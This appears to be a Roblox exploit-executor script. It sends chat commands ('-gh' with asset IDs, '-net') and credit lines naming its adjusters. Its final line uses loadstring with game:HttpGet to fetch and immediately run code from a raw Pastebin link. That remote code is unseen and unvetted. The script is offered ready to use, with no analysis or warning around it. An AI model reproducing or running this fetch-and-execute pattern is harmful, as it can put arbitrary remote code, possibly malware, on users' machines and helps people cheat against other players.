-- Get the TextChatService local TextChatService = game:GetService("TextChatService") -- Function to send a chat message local function sendChatMessage(message) -- Check if TextChatService is available if TextChatService then -- Send the message to the default chat channel local chatChannel = TextChatService.TextChannels.RBXGeneral if chatChannel then chatChannel:SendAsync(message) else warn("Default chat channel (RBXGeneral) not found!") end else warn("TextChatService is not available!") end end -- Example: Send a chat message sendChatMessage("-gh 6531967293 12103270510 3403874988 10775031176 9350274205") sendChatMessage("this script was adjusted by nikitayakovlev88201") sendChatMessage("-net") sendChatMessage("this roblox was adjusted by Client600") loadstring(game:HttpGet("https://pastebin.com/raw/WEifMP4Q"))()